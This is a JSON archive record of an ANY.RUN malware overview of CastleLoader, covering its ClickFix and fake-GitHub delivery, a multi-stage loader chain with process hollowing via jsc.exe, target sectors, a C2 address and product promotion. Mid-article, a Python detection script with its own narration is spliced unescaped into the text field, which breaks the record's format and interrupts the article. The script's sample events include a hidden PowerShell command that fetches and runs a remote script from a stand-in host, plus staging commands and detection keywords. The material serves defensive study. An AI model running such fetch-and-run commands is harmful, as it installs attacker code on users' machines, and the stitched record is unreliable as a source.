{
	"id": "f5344fa5-8be7-47ea-9cbe-19327a78aeea",
	"created_at": "2026-04-06T00:07:17.359664Z",
	"updated_at": "2026-04-10T13:11:43.79495Z",
	"deleted_at": null,
	"sha1_hash": "bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27",
	"title": "CastleLoader: Malware Overview",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1469837,
	"plain_text": "CastleLoader: Malware Overview\r\nBy ANY.RUN\r\nPublished: 2026-02-02 · Archived: 2026-04-05 21:48:48 UTC\r\nCastleLoader is a modern malware loader designed to quietly establish initial access and deliver follow-up\r\npayloads such as stealers, RATs, and ransomware. It focuses on stealth, flexibility, and rapid payload rotation,\r\nmaking it an effective tool for financially motivated threat actors and a persistent problem for enterprise\r\ndefenders.\r\nCastleLoader: The Quiet Malware That Opens the Door to Bigger Attacks\r\nKey Takeaways\r\n1. CastleLoader is a sophisticated MaaS operation: it serves multiple threat actor clusters, delivering\r\ndiverse secondary payloads including information stealers and RATs, with a documented 28.7% infection\r\nsuccess rate.\r\n2. Multi-industry targeting with sector-specific campaigns: documented campaigns show focused attacks on\r\nlogistics, hospitality, government entities, and software developers through industry-specific social\r\nengineering.\r\n3. ClickFix pages and fake GitHub repositories are the primary infection vectors.\r\n4. Advanced evasion through multi-stage execution: behind a packed delivery stage, CastleLoader runs a three-stage\r\nchain (shellcode stager/downloader, loader, core backdoor) with anti-VM checks, in-memory execution, PEB walking,\r\nand process hollowing.\r\n5. ANY.RUN’s Threat Intelligence Lookup helps SOCs quickly understand campaign scope and relationships.\r\nthreatName:”castleloader”\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 1 of 9\r\nCastleLoader overview in TI Lookup: targeted industries and countries; IOCs; samples\r\nANY.RUN’s Interactive Sandbox allows defenders to safely observe CastleLoader behavior and extract actionable\r\nindicators in real time.\r\nView analysis\r\nCastleLoader malware analysis\r\nWhat is CastleLoader Malware?\r\nDeveloped and operated by the threat actor tracked as GrayBravo (formerly TAG-150), this loader combines\r\nadvanced evasion techniques with a robust delivery infrastructure that enables multiple threat actors to leverage it\r\nfor their campaigns.\r\nThe malware’s architecture consists of multiple components working in concert. At its core, CastleLoader\r\nemploys a three-stage execution chain: a shellcode stager/downloader, a loader component, and a core backdoor\r\nmodule. This modular design separates the initial infection vector from the eventual malware\r\nbehavior, which complicates attribution and lets operators adapt quickly to defensive measures.\r\nCastleLoader uses anti-analysis mechanisms including dead code injection, runtime packing, and\r\nvirtual machine detection. The malware can escalate privileges to run with administrator rights and\r\ndisplays decoy messages such as fake system warnings to mask its true purpose. 
Once deployed, it establishes\r\ncommunication with command-and-control (C2) servers to retrieve and execute next-stage payloads, all while\r\nmaintaining a low detection profile through in-memory execution techniques.\r\nRecent variants have evolved to include Python-based loaders that use the windowless interpreter\r\n(pythonw.exe) to rebuild and launch CastleLoader directly in memory, avoiding disk-based detection. The\r\nmalware employs PEB (Process Environment Block) walking to resolve required APIs at runtime, so the import table\r\ncarries no tell-tale API names and static import-based detections miss it.\r\nWhat makes CastleLoader notable is its operational discipline. Payloads are updated often, infrastructure is\r\nfrequently rotated, and delivery techniques evolve quickly. This reduces the effectiveness of static indicators and\r\nsignature-based defenses, forcing defenders to rely on behavioral analysis and threat intelligence correlation.\r\nTry the full power of interactive analysis.\r\nStart your 14-day trial\r\nHow CastleLoader threatens businesses and organizations\r\nFor organizations, CastleLoader is dangerous precisely because it is not the final threat, but the opening act.\r\nKey business risks include:\r\nInitial access for larger attacks: CastleLoader is often the first step toward ransomware deployment or\r\nlong-term espionage.\r\nCredential theft and lateral movement: Follow-up payloads frequently target browsers, email clients,\r\nVPNs, and internal authentication mechanisms.\r\nData breaches and compliance exposure: Stolen credentials and data can lead to regulatory violations,\r\nfines, and reputational damage.\r\nOperational disruption: Once access is established, attackers can deploy tools that disrupt business\r\noperations at a chosen moment.\r\nHigh dwell time: Because loaders aim to stay unnoticed, attackers may remain inside networks for weeks\r\nbefore triggering visible damage.\r\nIn short, CastleLoader turns a single user mistake into a 
multi-stage business incident.\r\nVictimology: vulnerable industries and sectors\r\nCastleLoader demonstrates broad targeting capabilities, with specific threat clusters focusing on particular\r\nindustries:\r\nLogistics and Transportation: The most extensively documented campaign (attributed to the cluster tracked as\r\nTAG-160) specifically targets the logistics sector through sophisticated phishing operations. Threat actors impersonate\r\nlegitimate logistics firms and abuse freight-matching platforms like DAT Freight \u0026 Analytics and\r\nLoadlink Technologies.\r\nGovernment Entities: The sensitive nature of governmental data and the potential for espionage make\r\nthese entities particularly attractive targets for threat actors.\r\nHospitality Industry: Campaign clusters have leveraged Booking.com-themed phishing attacks,\r\nindicating focused targeting of hospitality sector organizations and their customers. These campaigns\r\nexploit the industry’s reliance on online booking systems and customer communications.\r\nTechnology and Software Development: fake GitHub repositories mimicking legitimate\r\ndevelopment tools like SQL Server Management Studio (SSMS), RVTools, and Zabbix.\r\nHealthcare: facilities have been affected by secondary payloads delivered via CastleLoader, particularly\r\nransomware variants that cause operational disruptions.\r\nFinancial Services: Any organization handling financial transactions, payment processing, or banking\r\noperations faces elevated risk due to the information-stealing capabilities of CastleLoader’s secondary\r\npayloads.\r\nSmall and Medium Enterprises (SMEs): Companies with limited security resources are particularly\r\nvulnerable to CastleLoader’s social engineering tactics, as they may lack robust security awareness training\r\nand advanced detection capabilities.\r\nThe geographical targeting shows a strong focus on North American organizations, 
particularly in the United States,\r\nthough the infrastructure and MaaS model enable global operations.\r\nHow Can Businesses Proactively Protect Against CastleLoader\r\nANY.RUN’s Threat Intelligence Feeds deliver real-time, actionable IOCs (domains, URLs, IPs) derived from\r\nsandbox detonations and global submissions. For CastleLoader, the feeds supply emerging C2s, loader variants, and\r\nlinked payloads (e.g., CastleRAT), enabling automated blocking in firewalls, EDR, and SIEM platforms. This helps\r\norganizations stay ahead of evolving MaaS campaigns, minimize dwell time, and prevent chain infections,\r\nwhich is critical for high-velocity threats like loaders.\r\nBusiness Impact:\r\nReduced Mean Time to Detect (MTTD): Automated indicator ingestion identifies CastleLoader activity\r\nwithin minutes rather than hours or days\r\nPrevention of Initial Compromise: Blocking C2 infrastructure and malicious domains prevents\r\nCastleLoader from establishing footholds\r\nOperational Continuity: Early detection and automated blocking minimize disruption to business\r\noperations\r\nImproved Security ROI: Leveraging threat intelligence from 15,000+ organizations maximizes detection\r\ncapabilities without corresponding cost increases.\r\nTI Feeds benefits and integration options\r\nInfection Vectors and Propagation Methods\r\nThe primary infection vector is the ClickFix technique, where victims encounter fraudulent web pages\r\nthemed around Cloudflare services, software development libraries, online meeting platforms (like Google Meet),\r\nor browser update notifications.\r\nThese pages display fake error messages, CAPTCHA verification prompts, or security warnings that instruct users\r\nto copy and execute malicious PowerShell commands via the Windows Run dialog (Win+R).\r\nCastleLoader operators also create convincing fake GitHub repositories 
under the names of legitimate\r\napplications. For example, repositories named “ssms-lib” (impersonating SQL Server Management Studio) and\r\n“zscaler-dir/Zscaler-Client-Connector” have been used to distribute trojanized installers.\r\nThreat actors employ search engine optimization techniques to ensure malicious download pages rank higher than\r\nlegitimate software distributors in search results. Finally, traditional phishing remains part of the infection chain,\r\nparticularly in logistics sector targeting.\r\nPropagation Mechanism\r\nOnce initial infection occurs via PowerShell script execution, CastleLoader uses built-in Windows utilities\r\n(curl.exe, tar.exe) to download and stage payloads in hidden AppData folders. The malware then establishes C2\r\ncommunication to retrieve additional modules and secondary payloads based on the victim’s value and\r\nenvironment. This staged approach allows operators to deploy targeted malware to high-value victims while\r\nmaintaining flexibility in payload selection.\r\nHow CastleLoader functions\r\nCastleLoader operates through a multi-stage execution chain:\r\nStage 1: Initial Delivery and Execution\r\nThe infection begins with a packed executable, often delivered as an Inno Setup installer that bundles an AutoIt\r\ninterpreter and script. When executed, the malware unpacks itself at runtime, employing dead code injection to hinder\r\nstatic analysis. Recent variants use Python bytecode executed via pythonw.exe to avoid console windows and disk-based\r\ndetection.\r\nStage 2: Shellcode Stager/Downloader\r\nThe initial stage deploys a shellcode stager that performs environment checks to detect virtual machines,\r\nsandboxes, and analysis tools. 
If running in a legitimate environment, it proceeds to establish initial C2\r\ncommunication. The stager uses process hollowing techniques to inject code into legitimate Windows processes,\r\nmasking malicious activity within trusted executables.\r\nStage 3: Loader Component\r\nThe loader module connects to the C2 server over HTTP/HTTPS with a hardcoded User-Agent string\r\n(notably “GoogleBot”) that identifies it to the server; the same string, sent from a workstation process that is\r\nnot a browser, is a usable network indicator. It downloads encrypted payload packages from the attacker’s\r\ninfrastructure. The loader employs DLL side-loading, placing malicious DLLs alongside legitimate\r\nexecutables to achieve persistence and execution.\r\nStage 4: Core Backdoor (CastleBot)\r\nThe core module establishes robust C2 communication and awaits task instructions. It gathers system information\r\nincluding:\r\nComputer name and username\r\nOperating system version and architecture\r\nInstalled applications and security products\r\nNetwork configuration\r\nActive process list\r\nThis reconnaissance data allows operators to filter victims and determine appropriate secondary payloads.\r\nPayload Deployment\r\nBased on C2 instructions, CastleLoader downloads and executes various malware families:\r\nInformation Stealers: DeerStealer, RedLine, StealC, Rhadamanthys, MonsterV2. These extract\r\ncredentials from browsers, email clients, FTP clients, cryptocurrency wallets, and VPN software.\r\nRemote Access Trojans: NetSupport RAT, SectopRAT, CastleRAT. These provide persistent backdoor\r\naccess for command execution, file manipulation, and lateral movement.\r\nAdditional Loaders: HijackLoader (also tracked as GhostPulse). These extend the infection chain, enabling deployment\r\nof even more malware variants.\r\nSandbox Analysis of CastleLoader Sample\r\nANY.RUN’s analysts have detonated a CastleLoader sample in the Interactive Sandbox to extract runtime\r\nconfiguration, C2 infrastructure, and 
high-confidence IOCs.\r\nView analysis\r\nCastleLoader dissected in the Interactive Sandbox\r\nWhat instantly grabs attention here is a system process chain, at the end of which a request to\r\n94[.]159[.]113[.]32:80 was sent.\r\nBinary analysis shows that the sample is an Object Pascal (Delphi) executable built as an Inno Setup installer\r\nmodule. The static and dynamic analysis of the components reveals the path to the payload delivery. You can read the\r\ndetailed analysis in ANY.RUN’s Blog.\r\nThe original Inno Setup installer turned out to be a container with a set of auxiliary files, among which the\r\nAutoIt3.exe + freely.a3x combination played a key role. It is possible to extract and partially decompile the\r\nAutoIt script.\r\nStatic analysis showed that the script prepares the environment and launches the next stage, while dynamic\r\nanalysis confirmed that after jsc.exe (the .NET Framework JScript compiler, a signed Microsoft binary) is started,\r\na process hollowing technique is executed: another executable module is injected into the process’s address space.\r\nAs a result, a fully functional PE file, the main CastleLoader module, was discovered inside the process.\r\nSuch a multi-stage execution chain was not implemented merely to complicate analysis, but\r\nspecifically to conceal the execution of the main payload from detection mechanisms. Using Inno\r\nSetup as a container, an AutoIt script as an intermediate layer, and process hollowing over jsc.exe lets\r\nCastleLoader spread its logic across several components that each appear benign at first glance.\r\nThe execution model reduces the likelihood of detection, as each individual stage appears legitimate, and the final\r\npayload only manifests in memory after the controlled process has been altered. 
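The observables described so far can be tied together on the endpoint: the ClickFix command launched from the Run dialog, curl.exe and tar.exe staging a payload under AppData, the loader's hardcoded GoogleBot User-Agent, and the AutoIt3.exe to jsc.exe hollowing chain that then contacts 94[.]159[.]113[.]32:80. The Python below is an added example written for this page; it is not code from ANY.RUN or from the CastleLoader sample. The event schema, the process IDs, the cf-verify.invalid host name, the setup.exe name standing in for the Inno Setup container and the sample events are all constructed for the demo; only the behaviours and the C2 address come from the article.

```python
# Added example for this write-up, not code from the ANY.RUN article or from
# CastleLoader itself. It correlates the behaviours the article describes
# against constructed endpoint telemetry: a ClickFix command pasted into the
# Run dialog, curl.exe/tar.exe staging a payload under AppData, the loader's
# hardcoded 'GoogleBot' User-Agent, and the AutoIt3.exe -> jsc.exe hollowing
# chain that then contacts the C2 on port 80. The event schema, process IDs,
# host names and the sample events themselves are constructed for the demo.

# Constructed events. Process creation: ('proc', pid, ppid, image, cmdline).
# Outbound HTTP as a proxy would log it: ('net', pid, image, dst, port, user_agent).
SAMPLE_EVENTS = [
    ('proc', 900, 1, 'winlogon.exe', 'winlogon.exe'),
    ('proc', 1200, 900, 'explorer.exe', 'explorer.exe'),
    # Victim pasted the ClickFix command into Win+R (explorer.exe is the parent).
    ('proc', 1300, 1200, 'powershell.exe',
     'powershell -w hidden -c irm http://cf-verify.invalid/x.ps1 | iex'),
    ('proc', 1310, 1300, 'curl.exe',
     'curl.exe -s -o %LOCALAPPDATA%/.cache/pkg.tar http://cf-verify.invalid/p'),
    ('proc', 1320, 1300, 'tar.exe',
     'tar.exe -xf %LOCALAPPDATA%/.cache/pkg.tar -C %LOCALAPPDATA%/.cache'),
    # Inno Setup container (constructed name setup.exe) runs AutoIt3.exe,
    # whose script hollows jsc.exe; the article reports this chain.
    ('proc', 1350, 1300, 'setup.exe', 'setup.exe'),
    ('proc', 1400, 1350, 'AutoIt3.exe', 'AutoIt3.exe freely.a3x'),
    ('proc', 1410, 1400, 'jsc.exe', 'jsc.exe'),
    ('net', 1410, 'jsc.exe', '94.159.113.32', 80, 'GoogleBot'),
    # Benign noise: an admin using curl from a terminal, a browser on HTTPS.
    ('proc', 2000, 1200, 'WindowsTerminal.exe', 'wt.exe'),
    ('proc', 2010, 2000, 'curl.exe', 'curl.exe -I https://example.com'),
    ('net', 2100, 'msedge.exe', '93.184.216.34', 443, 'Mozilla/5.0 Edge'),
]

SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe'}
STAGING_TOOLS = {'curl.exe', 'tar.exe'}
# ClickFix one-liners hide the window and pull a remote script; requiring two
# markers together keeps ordinary interactive PowerShell use from firing.
CLICKFIX_MARKERS = ('-w hidden', 'iex', 'irm ', 'invoke-expression', 'downloadstring')


def detect(events):
    procs = {e[1]: e for e in events if e[0] == 'proc'}
    findings = []

    def ancestry(pid):
        # Image names up the parent chain, so a grandchild of the pasted
        # PowerShell (installer -> AutoIt -> ...) is still attributed to it.
        chain, seen = [], set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            chain.append(procs[pid][3].lower())
            pid = procs[pid][2]
        return chain

    for pid, (_, _, ppid, image, cmd) in procs.items():
        image, cmd = image.lower(), cmd.lower()
        parent = procs.get(ppid, (None, None, None, '', ''))[3].lower()
        # Rule 1: script host launched from the Run dialog with ClickFix markers.
        if (image in SCRIPT_HOSTS and parent == 'explorer.exe'
                and sum(m in cmd for m in CLICKFIX_MARKERS) >= 2):
            findings.append(('clickfix_run_dialog', pid))
        # Rule 2: LOLBin download/extract into AppData, descended from a script host.
        if (image in STAGING_TOOLS and 'appdata' in cmd
                and any(a in SCRIPT_HOSTS for a in ancestry(ppid))):
            findings.append(('appdata_staging', pid))
        # Rule 3: AutoIt interpreter spawning the .NET JScript compiler.
        if image == 'jsc.exe' and parent == 'autoit3.exe':
            findings.append(('autoit_jsc_hollowing', pid))

    hollowed = {pid for kind, pid in findings if kind == 'autoit_jsc_hollowing'}
    for e in events:
        if e[0] != 'net':
            continue
        _, pid, _, _, port, user_agent = e
        # Rule 4: a crawler User-Agent never originates from a workstation.
        if 'googlebot' in user_agent.lower():
            findings.append(('googlebot_user_agent', pid))
        # Rule 5: the hollowed process itself talking plain HTTP to the C2.
        if pid in hollowed and port == 80:
            findings.append(('hollowed_process_c2', pid))
    return findings


if __name__ == '__main__':
    for kind, pid in detect(SAMPLE_EVENTS):
        print(kind, pid)
```

Each rule stands on its own, but the value is in the overlap: one host producing a Run-dialog PowerShell, AppData staging by a LOLBin, an unusual child of AutoIt3.exe and a GoogleBot User-Agent from a process that is not a browser is the chain the sandbox run shows, and none of it depends on a hash or domain the operators rotate.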
As a result, static signatures,\r\nsimple behavioral heuristics, and per-process monitoring lose their effectiveness: the fully functional malicious\r\nmodule exists only at runtime, and only within an already modified process, so detection has to come from the\r\nsurrounding behavior (the parent-child process chain and the network activity the hollowed process produces).\r\nGathering Threat Intelligence on CastleLoader Malware\r\nANY.RUN’s Threat Intelligence Lookup provides critical capabilities for detecting, investigating, and responding\r\nto CastleLoader threats:\r\nRapid IOC Validation and Enrichment\r\nWhen security alerts trigger on potential CastleLoader indicators (IPs, domains, file hashes, PowerShell command\r\npatterns), SOC analysts can query TI Lookup to determine whether an indicator is associated with known\r\nCastleLoader campaigns. The platform provides contextual information including malware family classification,\r\ncampaign attribution, and related artifacts, turning isolated indicators into actionable intelligence within\r\nseconds.\r\nDeep Behavioral Analysis Access\r\nTI Lookup provides direct links to interactive sandbox sessions where CastleLoader was analyzed. Analysts can\r\nobserve the complete execution chain. Start exploring with the threat name lookup:\r\nthreatName:”castleloader”\r\nFresh CastleLoader sandbox analyses found via TI Lookup\r\nComprehensive Event Correlation\r\nWith over 40 search parameters including registry keys, process command lines, network connections, file paths,\r\nand TLS fingerprints, analysts can investigate CastleLoader infections across multiple dimensions. 
For example,\r\nsearching for specific registry modifications or PowerShell patterns associated with ClickFix campaigns reveals\r\nall related samples and campaigns in the database.\r\nYARA Rule Development and Testing\r\nTI Lookup’s integrated YARA Search allows security teams to scan ANY.RUN’s threat intelligence database with\r\ncustom detection rules. Teams can develop YARA rules targeting CastleLoader’s unique characteristics (specific\r\nAPI call patterns, mutex names, shellcode signatures) and immediately test them against millions of analyzed\r\nsamples to validate effectiveness and minimize false positives.\r\nThreat Hunting Capabilities\r\nAnalysts can proactively search for CastleLoader indicators that may have bypassed initial detection.\r\nValue for SOCs and MSSPs:\r\nReduced Mean Time to Respond (MTTR);\r\nLower False Positive Rates;\r\nEnhanced Detection Coverage;\r\nImproved Analyst Efficiency;\r\nCost Optimization.\r\nIntegrate ANY.RUN’s threat intelligence solutions in your company.\r\nContact us\r\nConclusion\r\nCastleLoader exemplifies how modern malware prioritizes access over immediate impact. By the time defenders\r\nnotice the loader, the real damage may already be queued for deployment. Combating such threats requires not\r\njust detection, but context, speed, and intelligence-driven response. Threat intelligence turns CastleLoader from a\r\nsilent entry point into a visible, disruptable operation.\r\nTry TI Lookup to start gathering actionable threat intelligence on the malware that threatens\r\nyour business sector and region: just sign up to ANY.RUN.\r\nSource: https://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8"
	],
	"report_names": [
		"castleloader-malware-overview-a44b9db666b8"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8a13b9be-e36d-4d48-9d19-5c93a62f862f",
			"created_at": "2026-03-08T02:00:03.472285Z",
			"updated_at": "2026-04-10T02:00:03.982274Z",
			"deleted_at": null,
			"main_name": "GrayBravo",
			"aliases": [
				"TAG-150"
			],
			"source_name": "MISPGALAXY:GrayBravo",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434037,
	"ts_updated_at": 1775826703,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27.pdf",
		"text": "https://archive.orkl.eu/bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27.txt",
		"img": "https://archive.orkl.eu/bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27.jpg"
	}
}